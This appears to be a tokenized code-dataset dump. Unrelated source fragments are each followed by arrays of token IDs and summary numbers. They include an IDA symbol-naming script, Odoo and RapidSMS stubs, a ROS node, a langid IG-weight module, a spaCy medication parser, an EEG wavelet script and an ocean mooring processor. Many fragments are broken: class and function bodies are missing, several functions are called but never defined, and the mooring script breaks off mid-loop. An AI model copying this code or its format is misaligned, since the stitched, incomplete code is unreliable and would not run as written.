set_name(0x8014B974, "start_mdec_decode", SN_NOWARN)
set_name(0x8014BAF8, "DCT_out_handler", SN_NOWARN)
set_name(0x8014BB94, "init_mdec", SN_NOWARN)
set_name(0x8014BC04, "init_mdec_buffer", SN_NOWARN)
set_name(0x8014BC20, "split_poly_area", SN_NOWARN)
set_name(0x8014C010, "rebuild_mdec_polys", SN_NOWARN)
set_name(0x8014C1E4, "clear_mdec_frame", SN_NOWARN)
set_name(0x8014C1F0, "draw_mdec_polys", SN_NOWARN)
set_name(0x8014C53C, "invalidate_mdec_frame", SN_NOWARN)
set_name(0x8014C550, "is_frame_decoded", SN_NOWARN)
set_name(0x8014C55C, "init_mdec_polys", SN_NOWARN)
set_name(0x8014C8EC, "set_mdec_poly_bright", SN_NOWARN)
set_name(0x8014C954, "init_mdec_stream", SN_NOWARN)
set_name(0x8014C9A4, "init_mdec_audio", SN_NOWARN)
set_name(0x8014CA5C, "kill_mdec_audio", SN_NOWARN)
set_name(0x8014CA8C, "stop_mdec_audio", SN_NOWARN)
set_name(0x8014CAB0, "play_mdec_audio", SN_NOWARN)
set_name(0x8014CD4C, "set_mdec_audio_volume", SN_NOWARN)
set_name(0x8014CE18, "resync_audio", SN_NOWARN)
set_name(0x8014CE48, "stop_mdec_stream", SN_NOWARN)
set_name(0x8014CE94, "dequeue_stream", SN_NOWARN)
set_name(0x8014CF80, "dequeue_animation", SN_NOWARN)
set_name(0x8014D130, "decode_mdec_stream", SN_NOWARN)
set_name(0x8014D31C, "play_mdec_stream", SN_NOWARN)
set_name(0x8014D3D0, "clear_mdec_queue", SN_NOWARN)
set_name(0x8014D3FC, "StrClearVRAM", SN_NOWARN)
set_name(0x8014D4BC, "PlayFMVOverLay", SN_NOWARN)
set_name(0x8014D8C4, "GetDown__C4CPad", SN_NOWARN)
set_name(0x8013A98C, "map_buf", SN_NOWARN)
set_name(0x8014998C, "imgbuf", SN_NOWARN)
set_name(0x801499E0, "br", SN_NOWARN)
set_name(0x8014A020, "tmdc_pol", SN_NOWARN)
set_name(0x8014A660, "mdc_buf", SN_NOWARN)
set_name(0x8014A670, "tmdc_pol_offs", SN_NOWARN)
set_name(0x8014ACB0, "mdc_idx", SN_NOWARN)
set_name(0x8014ACD8, "mdec_queue", SN_NOWARN)
set_name(0x8014AE18, "mdec_drenv", SN_NOWARN)
set_name(0x8014AE98, "stream_buf", SN_NOWARN)
set_name(0x8014AF1C, "stream_bufh", SN_NOWARN)
| [
2617,
62,
3672,
7,
15,
87,
23,
28645,
32,
7708,
15,
11,
366,
16412,
62,
10210,
62,
36163,
1600,
11346,
62,
45669,
1503,
45,
8,
198,
2617,
62,
3672,
7,
15,
87,
23,
28645,
32,
7708,
23,
11,
366,
26708,
62,
34,
67,
3855,
50,
9250... | 1.93456 | 1,467 |
# Copyright 2018,2020 Ivan Yelizariev <https://it-projects.info/team/yelizariev>
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).
from odoo import models
from odoo.http import request
| [
2,
15069,
2864,
11,
42334,
21798,
28876,
528,
283,
11203,
1279,
5450,
1378,
270,
12,
42068,
13,
10951,
14,
15097,
14,
88,
417,
528,
283,
11203,
29,
198,
2,
13789,
17370,
6489,
12,
18,
13,
15,
393,
1568,
357,
4023,
1378,
2503,
13,
... | 2.898551 | 69 |
import argparse
# model_name_or_path 'openai-gpt2' did not work, just gpt2 now
| [
11748,
1822,
29572,
198,
2,
2746,
62,
3672,
62,
273,
62,
6978,
705,
9654,
1872,
12,
70,
457,
17,
6,
750,
407,
670,
11,
655,
308,
457,
17,
783,
628,
198
] | 2.612903 | 31 |
from rapidsms.router.blocking import BlockingRouter
from celery_router.tasks import rapidsms_handle_message
class CeleryRouter(BlockingRouter):
"""Skeleton router only used to execute the Celery task."""
| [
6738,
4095,
2340,
907,
13,
472,
353,
13,
41938,
1330,
1086,
8629,
49,
39605,
198,
198,
6738,
18725,
1924,
62,
472,
353,
13,
83,
6791,
1330,
4095,
2340,
907,
62,
28144,
62,
20500,
628,
198,
4871,
15248,
1924,
49,
39605,
7,
3629,
8629... | 3.246154 | 65 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import rospy
import sys
from std_msgs.msg import String
rospy.init_node('boke') # ノード名「count」に設定
pub = rospy.Publisher('funny_boke', String, queue_size=10) # パブリッシャ「count_up」を作成
rate = rospy.Rate(10) # 10Hzで実行
input_line = ""
print("うちのおかんがな、好きな朝ごはんあるらしいねん")
print("でも名前忘れたらしくてね")
while "ありがとうございました" not in input_line:
print("ボケてください↓")
input_line = sys.stdin.readline()
pub.publish(input_line)
rate.sleep()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
17,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
686,
2777,
88,
198,
11748,
25064,
198,
6738,
14367,
62,
907,
14542,
13,
19662,
1330,
10903,
198,
198,
... | 1.626866 | 335 |
#!/bin/false
# Copyright (c) 2022 Vít Labuda. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import final, Final, Any, Sequence, Type, Dict, Hashable, Union, Optional, Tuple
from datalidator.blueprints.BlueprintIface import BlueprintIface
from datalidator.blueprints.DefaultBlueprintWithStandardFeaturesImplBase import DefaultBlueprintWithStandardFeaturesImplBase
from datalidator.blueprints.extras.ObjectModel import ObjectModel
from datalidator.blueprints.extras.OptionalItemIface import OptionalItemIface
from datalidator.blueprints.impl.PredefinedDictionaryBlueprint import PredefinedDictionaryBlueprint
from datalidator.blueprints.exc.err.InvalidBlueprintConfigError import InvalidBlueprintConfigError
from datalidator.filters.FilterIface import FilterIface
from datalidator.validators.ValidatorIface import ValidatorIface
__all__ = "ObjectBlueprint",
class ObjectBlueprint(DefaultBlueprintWithStandardFeaturesImplBase[ObjectModel]):
"""
INPUT:
- any object convertible to 'dict' whose items conform to the initializer-provided 'object_model'
OUTPUT:
- an instance of the initializer-provided subclass of 'ObjectModel'
NOTE: See this library's examples for usage information.
"""
__slots__ = "__object_model", "__ignore_input_keys_which_are_not_in_model", "__predefined_dictionary_blueprint"
@final
@final
@final
| [
2,
48443,
8800,
14,
9562,
198,
198,
2,
15069,
357,
66,
8,
33160,
569,
8836,
83,
3498,
15339,
13,
1439,
2489,
10395,
13,
198,
2,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
17613,
11,
389,
... | 3.587342 | 790 |
"""
IGWeight.py -
Compute IG Weights given a set of tokenized buckets and a feature set
Marco Lui, January 2013
Based on research by Marco Lui and Tim Baldwin.
Copyright 2013 Marco Lui <saffsd@gmail.com>. All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are
permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of
conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list
of conditions and the following disclaimer in the documentation and/or other materials
provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
The views and conclusions contained in the software and documentation are those of the
authors and should not be interpreted as representing official policies, either expressed
or implied, of the copyright holder.
"""
import argparse
import csv
import os
from collections import defaultdict
import numpy
from .common import unmarshal_iter, MapPool, Enumerator, write_weights, read_features
def entropy(v, axis=0):
"""
Optimized implementation of entropy. This version is faster than that in
scipy.stats.distributions, particularly over long vectors.
"""
v = numpy.array(v, dtype='float')
s = numpy.sum(v, axis=axis)
with numpy.errstate(divide='ignore', invalid='ignore'):
rhs = numpy.nansum(v * numpy.log(v), axis=axis) / s
r = numpy.log(s) - rhs
# Where dealing with binarized events, it is possible that an event always
# occurs and thus has 0 information. In this case, the negative class
# will have frequency 0, resulting in log(0) being computed as nan.
# We replace these nans with 0
nan_index = numpy.isnan(rhs)
if nan_index.any():
r[nan_index] = 0
return r
def setup_pass_IG(features, dist, binarize, suffix):
"""
@param features the list of features to compute IG for
@param dist the background distribution
@param binarize (boolean) compute IG binarized per-class if True
@param suffix of files in bucketdir to process
"""
global __features, __dist, __binarize, __suffix
__features = features
__dist = dist
__binarize = binarize
__suffix = suffix
def pass_IG(bucket):
"""
In this pass we compute the information gain for each feature, binarized
with respect to each language as well as unified over the set of all
classes.
@global __features the list of features to compute IG for
@global __dist the background distribution
@global __binarize (boolean) compute IG binarized per-class if True
@global __suffix of files in bucketdir to process
@param bucket the bucket file to process. It is assumed to contain marshalled (term, event_id, count) triplets.
"""
global __features, __dist, __binarize, __suffix
# We first tally the per-event frequency of each
# term in our selected feature set.
term_freq = defaultdict(lambda: defaultdict(int))
term_index = defaultdict(Enumerator())
for path in os.listdir(bucket):
if path.endswith(__suffix):
for key, event_id, count in unmarshal_iter(os.path.join(bucket,path)):
# Select only our listed features
if key in __features:
term_index[key]
term_freq[key][event_id] += count
num_term = len(term_index)
num_event = len(__dist)
cm_pos = numpy.zeros((num_term, num_event), dtype='int')
for term,term_id in term_index.iteritems():
# update event matrix
freq = term_freq[term]
for event_id, count in freq.iteritems():
cm_pos[term_id, event_id] = count
cm_neg = __dist - cm_pos
cm = numpy.dstack((cm_neg, cm_pos))
if not __binarize:
# non-binarized event space
x = cm.sum(axis=1)
term_w = x / x.sum(axis=1)[:, None].astype(float)
# Entropy of the term-present/term-absent events
e = entropy(cm, axis=1)
# Information Gain with respect to the set of events
ig = entropy(__dist) - (term_w * e).sum(axis=1)
else:
# binarized event space
# Compute IG binarized with respect to each event
ig = list()
for event_id in range(num_event):
num_doc = __dist.sum()
prior = numpy.array((num_doc - __dist[event_id], __dist[event_id]), dtype=float) / num_doc
cm_bin = numpy.zeros((num_term, 2, 2), dtype=int) # (term, p(term), p(lang|term))
cm_bin[:,0,:] = cm.sum(axis=1) - cm[:,event_id,:]
cm_bin[:,1,:] = cm[:,event_id,:]
e = entropy(cm_bin, axis=1)
x = cm_bin.sum(axis=1)
term_w = x / x.sum(axis=1)[:, None].astype(float)
ig.append( entropy(prior) - (term_w * e).sum(axis=1) )
ig = numpy.vstack(ig)
terms = sorted(term_index, key=term_index.get)
return terms, ig
def read_dist(path):
"""
Read the distribution from a file containing item, count pairs.
@param path path to read form
"""
with open(path) as f:
reader = csv.reader(f)
return numpy.array(zip(*reader)[1], dtype=int)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-j","--jobs", type=int, metavar='N', help="spawn N processes (set to 1 for no paralleization)")
parser.add_argument("-f","--features", metavar='FEATURE_FILE', help="read features from FEATURE_FILE")
parser.add_argument("-w","--weights", metavar='WEIGHTS', help="output weights to WEIGHTS")
parser.add_argument("model", metavar='MODEL_DIR', help="read index and produce output in MODEL_DIR")
parser.add_argument("-d","--domain", action="store_true", default=False, help="compute IG with respect to domain")
parser.add_argument("-b","--binarize", action="store_true", default=False, help="binarize the event space in the IG computation")
parser.add_argument("-l","--lang", action="store_true", default=False, help="compute IG with respect to language")
args = parser.parse_args()
if not(args.domain or args.lang) or (args.domain and args.lang):
parser.error("exactly one of domain(-d) or language (-l) must be specified")
if args.features:
feature_path = args.features
else:
feature_path = os.path.join(args.model, 'DFfeats')
bucketlist_path = os.path.join(args.model, 'bucketlist')
if not os.path.exists(feature_path):
parser.error('{0} does not exist'.format(feature_path))
bucketlist = map(str.strip, open(bucketlist_path))
features = read_features(feature_path)
if args.domain:
index_path = os.path.join(args.model,'domain_index')
suffix = '.domain'
elif args.lang:
index_path = os.path.join(args.model,'lang_index')
suffix = '.lang'
else:
raise ValueError("no event specified")
if args.weights:
weights_path = args.weights
else:
weights_path = os.path.join(args.model, 'IGweights' + suffix + ('.bin' if args.binarize else ''))
# display paths
print("model path:", args.model )
print("buckets path:", bucketlist_path)
print("features path:", feature_path)
print("weights path:", weights_path)
print("index path:", index_path)
print("suffix:", suffix)
print("computing information gain")
dist = read_dist(index_path)
ig = compute_IG(bucketlist, features, dist, args.binarize, suffix, args.jobs)
write_weights(ig, weights_path)
| [
37811,
198,
3528,
25844,
13,
9078,
532,
198,
7293,
1133,
35336,
775,
2337,
1813,
257,
900,
286,
11241,
1143,
38674,
290,
257,
3895,
900,
198,
198,
37179,
6026,
72,
11,
3269,
2211,
198,
198,
15001,
319,
2267,
416,
16556,
6026,
72,
290,... | 2.710065 | 3,080 |
import pandas as pd
from collections import defaultdict
from collections import OrderedDict
import matplotlib.pyplot as plt
import random
import re
import ast
from nltk.corpus import wordnet as wn
import spacy
from spacy import displacy
from collections import Counter
import en_core_web_sm
nlp = spacy.load("en")
print(nlp)
df_medications=pd.read_excel("sample_medication.xlsx")
medication_list=df_medications["text"].tolist()
medication_list_med=df_medications["medication"].tolist()
dosage_list=[]
timing_list=[]
purpose_list=[]
for i in range(len(medication_list)):
u=medication_list[i].strip()
doc = nlp(u)
dosages=[]
timings=[]
medications=[]
purposes=[]
dosage_indicators=["every", "each", "per", "once", "twice", "thrice", "times"]
for ent in doc.ents:
#print(ent.text, ent.label_)
if ent.label_ == 'DATE':
tex=ent.text.lower()
if any(sub in tex for sub in dosage_indicators): dosages.append(tex)
else: timings.append(tex)
for chunk in doc.noun_chunks:
#print("text: " + chunk.text)
#print("label: " + chunk.label_)
#print("root: " + chunk.root.text)
if chunk.root.text == 'DATE':
tex=chunk.text.lower()
if any(sub in tex for sub in dosage_indicators): dosages.append(tex)
else: timings.append(tex)
else:
word_a=chunk.root.text
for token in doc:
word_b=token.text.lower()
if word_a!=word_b:
continue
lem=token.lemma_.lower()
#print(lem, token.pos_)
if token.pos_=="NOUN" and token.tag_=="NN":
s_lower= chunk.text.strip().lower()
if 'purpose' not in s_lower and 'medication' not in s_lower and 'dosage' not in s_lower and 'timing' not in s_lower:medications.append(chunk.text)
s_lower= chunk.text.strip().lower()
if 'purpose' not in s_lower and 'medication' not in s_lower and 'dosage' not in s_lower and 'timing' not in s_lower:purposes.append(chunk.text)
parts=u.split()
possible=["every", "once", "twice", "thrice"]
for index, part in enumerate(parts):
if (part=="times" or part=="time") and index>0:
new_dosage=parts[index-1]+" "+parts[index]
possible.append(new_dosage)
u=u.lower()
possible_prefix="|".join(possible)
possible_prefix="("+possible_prefix+")"
m = re.findall(possible_prefix+'(.*?)(\\.|day|week|month|year)', u)
if m!=None:
for m_elem in m:
t=m_elem[0]+m_elem[1]+m_elem[2]
dosages.append(t)
dosages=list(set(dosages))
'''
m = re.findall('(take|taking|took|taken|takes|taken)(.*?)(\\.|for|since)', u)
if m!=None:
for m_elem in m:
t=m_elem[1]
medications.append(t)
'''
medications=list(set(medications))
m = re.findall('(take|taking|took|taken|takes|taken|use|using|used|uses)(.+?)(for)(.+?)(\\.)', u)
if m!=None:
for m_elem in m:
#print(m_elem)
t=m_elem[3]
s=m_elem[1]
t_parts=t.split()
s_parts=s.split()
if len(t_parts)<=2:
purposes.append(t.strip().lower())
if len(s_parts)<=2:
medications.append(s.strip().lower())
purposes=list(set(purposes))
medications=list(set(medications))
m = re.findall('(medication |medication:|medications |medications:)(.+?)(,|\\.|and)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower= s.strip().lower()
medications.append(s_lower)
medications=list(set(medications))
m = re.findall('(purpose |problem |purpose:|purposes |purposes:)(.+?)(,|\\.|and)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower= s.strip().lower()
purposes.append(s_lower)
purposes=list(set(purposes))
m = re.findall('(timing |timing:|timings |timings:)(.+?)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower=s.strip().lower()
if s_lower!="":
timings.append(s_lower)
timings=list(set(timings))
m = re.findall('(dosage |dosage:|dosages |dosages:)(.+?)', u)
if m!=None:
for m_elem in m:
s=m_elem[1]
if len(s_parts)<=2:
s_lower=s.strip().lower()
if s_lower!="":
dosages.append(s_lower)
dosages=list(set(dosages))
print("response: ")
print(doc)
print("medications: ")
print(medications)
print("purpose: ")
print(purposes)
print("timing: ")
print(timings)
print("dosages: ")
print(dosages)
#df_medications=pd.read_excel("sample_medication.xlsx")
#medication_list=df_medications["text"].tolist()
#medication_list_med=df_medications["medication"].tolist()
dosage_list.append(dosages)
timing_list.append(timings)
purpose_list.append(purposes)
dic_res={
"text":medication_list,
"medications": medication_list_med,
"purposes": purpose_list,
"dosages": dosage_list,
"timings": timing_list
}
df_res=pd.DataFrame(dic_res)
df_res.to_csv('parsed_medication.csv')
| [
11748,
19798,
292,
355,
279,
67,
198,
6738,
17268,
1330,
4277,
11600,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
4738,
198,
11748,
302,
198,
11748,
6468,
198,
... | 1.944815 | 2,845 |
@Setup
@Token("T_STRING")
@Token("T_PRODUCER")
@Token("T_SPLIT")
@Pattern(["T_STRING", "T_PRODUCER", "T_STRING"])
@Pattern(["S_SUB"])
@Pattern(["S_SUB", "S_DEF"])
| [
31,
40786,
198,
198,
31,
30642,
7203,
51,
62,
18601,
2751,
4943,
198,
198,
31,
30642,
7203,
51,
62,
4805,
3727,
9598,
1137,
4943,
198,
198,
31,
30642,
7203,
51,
62,
4303,
43,
2043,
4943,
198,
198,
31,
47546,
7,
14692,
51,
62,
1860... | 1.857143 | 91 |
"""
Draw the maximum co-efficient value matrix
TODO: [Done]find the max RMD value, and get coefficient matrix for this value
"""
import numpy as np
import os
from scipy import signal
from scipy import stats
import matplotlib.pyplot as plt
# Global arrays
wav_out = []
def co_matrix(data):
"""
I will made the diagonal zeros for calculation
"""
count = 0
#cm = np.identity(34)
cm = np.zeros((31,31))
for i in range(31-1):
for j in range(i+1, 31):
cm[i, j] = data[count]
cm[j, i] = data[count]
count+=1
#print(count)
return cm
def wave_let(filter_data, raw_data):
"""
parameters:
filter_data: One channel of the filtered data
raw_data: One channel of the raw data
return:
the value of the whole channel
"""
total = 0
for i in range(raw_data.shape[0]):
total += raw_data[i] * morlet(filter_data[i])
#print(f)
return np.sqrt(filter_data.astype(np.complex)) * total
if __name__ == "__main__":
"""
# Read data
raw_data = np.load("raw_signal.npy", allow_pickle=True)
filtered_data = np.load("beta_signal.npy", allow_pickle=True)
#y = wave_let(filtered_data[0,1], raw_data[0,1])
#x = morlet(filtered_data[0,1][0,0])
#print(y)
for person in range(5):
for intensity in range(10):
raw = raw_data[person, intensity]
fil = filtered_data[person, intensity]
wav_data = np.empty_like(raw, dtype=np.complex)
for col in range(raw.shape[1]):
wav_data[:,col] = wave_let(fil[:,col], raw[:,col])
wav_out.append(wav_data)
all_waves = np.array(wav_out)
np.save("wavlet_beta_data", all_waves)
"""
wavelet_data = np.load("wavlet_beta_data.npy", allow_pickle=True)
#print(wavelet_data[0].shape)
# calculate the rmd value
rec_value = []
for intense in wavelet_data:
rec_value.append(RMD(intense))
np.save("RMD_beta_value", rec_value)
rmd_data = np.load("RMD_beta_value.npy", allow_pickle=True)
#print(rmd_data.shape)
#print(all_rmd[0].shape)
"""
max_index = np.argmax(rmd_data)
#print(max_index)
#print(rmd_data[max_index])
# find max for each person
rmd_data = np.load("RMD_value.npy", allow_pickle=True)
all_rmd = np.load("all_RMD_value.npy", allow_pickle=True)
for i in range(0, 50, 10):
max_index = np.argmax(rmd_data[i:i+10])
print("H", max_index, max_index+i)
person = co_matrix(all_rmd[max_index+i])
place = np.argmax(person)//31, np.argmax(person)%31
print(place)
"""
# plot
inten = np.linspace(0.1,1, 10)
for i in range(0,50,10):
person = "person", str(i/10+1)
plt.plot(inten, rmd_data[i:i+10], label=person)
plt.xlabel("intensity")
plt.ylabel("RMD")
plt.title("RMD for each_person")
plt.show()
| [
37811,
198,
25302,
262,
5415,
763,
12,
16814,
1988,
17593,
220,
198,
198,
51,
3727,
46,
25,
685,
45677,
60,
19796,
262,
3509,
371,
12740,
1988,
11,
290,
651,
35381,
17593,
329,
428,
1988,
198,
37811,
198,
198,
11748,
299,
32152,
355,
... | 2.137427 | 1,368 |
#print (text to write on the terminal)
print("ello world") | [
2,
4798,
357,
5239,
284,
3551,
319,
262,
12094,
8,
198,
4798,
7203,
11109,
995,
4943
] | 3.625 | 16 |
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# %% [markdown]
# # Process the raw mooring data
#
# Contents:
# * <a href=#raw>Raw data reprocessing.</a>
# * <a href=#corrected>Interpolated data processing.</a>
# * <a href=#ADCP>ADCP processing.</a>
# * <a href=#VMP>VMP processing.</a>
#
# Import the needed libraries.
# %%
import datetime
import glob
import os
import gsw
import numpy as np
import numpy.ma as ma
import scipy.integrate as igr
import scipy.interpolate as itpl
import scipy.io as io
import scipy.signal as sig
import seawater
import xarray as xr
from matplotlib import path
import munch
import load_data
import moorings as moo
import utils
from oceans.sw_extras import gamma_GP_from_SP_pt
# Data directory
data_in = os.path.expanduser("../data")
data_out = data_in
# %% [markdown]
# <a id="raw"></a>
# %% [markdown]
# ## Process raw data into a more convenient format
#
# Parameters for raw processing.
# %%
# Corrected levels.
# heights = [-540., -1250., -2100., -3500.]
# Filter cut off (hours)
tc_hrs = 40.0
# Start of time series (matlab datetime)
t_start = 734494.0
# Length of time series
max_len = N_data = 42048
# Data file
raw_data_file = "moorings.mat"
# Index where NaNs start in u and v data from SW mooring
sw_vel_nans = 14027
# Sampling period (minutes)
dt_min = 15.0
# Window length for wave stress quantities and mesoscale strain quantities.
nperseg = 2 ** 9
# Spectra parameters
window = "hanning"
detrend = "constant"
# Extrapolation/interpolation limit above which data will be removed.
dzlim = 100.0
# Integration of spectra parameters. These multiple N and f respectively to set
# the integration limits.
fhi = 1.0
flo = 1.0
flov = 1.0 # When integrating spectra involved in vertical fluxes, get rid of
# the near inertial portion.
# When bandpass filtering windowed data use these params multiplied by f and N
filtlo = 0.9 # times f
filthi = 1.1 # times N
# Interpolation distance that raises flag (m)
zimax = 100.0
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
N_per_day = int(1.0 / dt_day) # Samples per day.
# %% ############### PROCESS RAW DATA #########################################
print("RAW DATA")
###############################################################################
# Load w data for cc mooring and chop from text files. I checked and all the
# data has the same start date and the same length
print("Loading vertical velocity data from text files.")
nortek_files = glob.glob(os.path.join(data_in, "cc_1_*.txt"))
depth = []
for file in nortek_files:
with open(file, "r") as f:
content = f.readlines()
depth.append(int(content[3].split("=")[1].split()[0]))
idxs = np.argsort(depth)
w = np.empty((42573, 12))
datenum = np.empty((42573, 12))
for i in idxs:
YY, MM, DD, hh, W = np.genfromtxt(
nortek_files[i], skip_header=12, usecols=(0, 1, 2, 3, 8), unpack=True
)
YY = YY.astype(int)
MM = MM.astype(int)
DD = DD.astype(int)
mm = (60 * (hh % 1)).astype(int)
hh = np.floor(hh).astype(int)
w[:, i] = W / 100
dates = []
for j in range(len(YY)):
dates.append(datetime.datetime(YY[j], MM[j], DD[j], hh[j], mm[j]))
dates = np.asarray(dates)
datenum[:, i] = utils.datetime_to_datenum(dates)
idx_start = np.searchsorted(datenum[:, 0], t_start)
w = w[idx_start : idx_start + max_len]
# Start prepping raw data from the mat file.
print("Loading raw data file.")
data_path = os.path.join(data_in, raw_data_file)
ds = utils.loadmat(data_path)
cc = ds.pop("c")
nw = ds.pop("nw")
ne = ds.pop("ne")
se = ds.pop("se")
sw = ds.pop("sw")
cc["id"] = "cc"
nw["id"] = "nw"
ne["id"] = "ne"
se["id"] = "se"
sw["id"] = "sw"
moorings = [cc, nw, ne, se, sw]
# Useful information
dt_min = 15.0 # Sample period in minutes.
dt_sec = dt_min * 60.0 # Sample period in seconds.
dt_day = dt_sec / 86400.0 # Sample period in days.
print("Chopping time series.")
for m in moorings:
m["idx_start"] = np.searchsorted(m["Dates"], t_start)
for m in moorings:
m["N_data"] = max_len
m["idx_end"] = m["idx_start"] + max_len
# Chop data to start and end dates.
varl = ["Dates", "Temp", "Sal", "u", "v", "Pres"]
for m in moorings:
for var in varl:
m[var] = m[var][m["idx_start"] : m["idx_end"], ...]
print("Renaming variables.")
print("Interpolating negative pressures.")
for m in moorings:
__, N_levels = m["Pres"].shape
m["N_levels"] = N_levels
# Tile time and pressure
m["t"] = np.tile(m.pop("Dates")[:, np.newaxis], (1, N_levels))
# Fix negative pressures by interpolating nearby data.
fix = m["Pres"] < 0.0
if fix.any():
levs = np.argwhere(np.any(fix, axis=0))[0]
for lev in levs:
x = m["t"][fix[:, lev], lev]
xp = m["t"][~fix[:, lev], lev]
fp = m["Pres"][~fix[:, lev], lev]
m["Pres"][fix[:, lev], lev] = np.interp(x, xp, fp)
# Rename variables
m["P"] = m.pop("Pres")
m["u"] = m["u"] / 100.0
m["v"] = m["v"] / 100.0
m["spd"] = np.sqrt(m["u"] ** 2 + m["v"] ** 2)
m["angle"] = np.angle(m["u"] + 1j * m["v"])
m["Sal"][(m["Sal"] < 33.5) | (m["Sal"] > 34.9)] = np.nan
m["S"] = m.pop("Sal")
m["Temp"][m["Temp"] < -2.0] = np.nan
m["T"] = m.pop("Temp")
# Dimensional quantities.
m["f"] = gsw.f(m["lat"])
m["ll"] = np.array([m["lon"], m["lat"]])
m["z"] = gsw.z_from_p(m["P"], m["lat"])
# Estimate thermodynamic quantities.
m["SA"] = gsw.SA_from_SP(m["S"], m["P"], m["lon"], m["lat"])
m["CT"] = gsw.CT_from_t(m["SA"], m["T"], m["P"])
# specvol_anom = gsw.specvol_anom(m['SA'], m['CT'], m['P'])
# m['sva'] = specvol_anom
cc["wr"] = w
print("Calculating thermodynamics.")
print("Excluding bad data using T-S funnel.")
# Chuck out data outside of TS funnel sensible range.
funnel = np.genfromtxt("funnel.txt")
for m in moorings:
S = m["SA"].flatten()
T = m["CT"].flatten()
p = path.Path(funnel)
in_funnel = p.contains_points(np.vstack((S, T)).T)
fix = np.reshape(~in_funnel, m["SA"].shape)
m["in_funnel"] = ~fix
varl = ["S"]
if fix.any():
levs = np.squeeze(np.argwhere(np.any(fix, axis=0)))
for lev in levs:
x = m["t"][fix[:, lev], lev]
xp = m["t"][~fix[:, lev], lev]
for var in varl:
fp = m[var][~fix[:, lev], lev]
m[var][fix[:, lev], lev] = np.interp(x, xp, fp)
# Re-estimate thermodynamic quantities.
m["SA"] = gsw.SA_from_SP(m["S"], m["P"], m["lon"], m["lat"])
m["CT"] = gsw.CT_from_t(m["SA"], m["T"], m["P"])
print("Calculating neutral density.")
# Estimate the neutral density
for m in moorings:
# Compute potential temperature using the 1983 UNESCO EOS.
m["PT0"] = seawater.ptmp(m["S"], m["T"], m["P"])
# Flatten variables for analysis.
lons = m["lon"] * np.ones_like(m["P"])
lats = m["lat"] * np.ones_like(m["P"])
S_ = m["S"].flatten()
T_ = m["PT0"].flatten()
P_ = m["P"].flatten()
LO_ = lons.flatten()
LA_ = lats.flatten()
gamman = gamma_GP_from_SP_pt(S_, T_, P_, LO_, LA_)
m["gamman"] = np.reshape(gamman, m["P"].shape) + 1000.0
print("Calculating slice gradients at C.")
# Want gradient of density/vel to be local, no large central differences.
slices = [slice(0, 4), slice(4, 6), slice(6, 10), slice(10, 12)]
cc["dgdz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dTdz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dudz"] = np.empty((cc["N_data"], cc["N_levels"]))
cc["dvdz"] = np.empty((cc["N_data"], cc["N_levels"]))
for sl in slices:
z = cc["z"][:, sl]
g = cc["gamman"][:, sl]
T = cc["T"][:, sl]
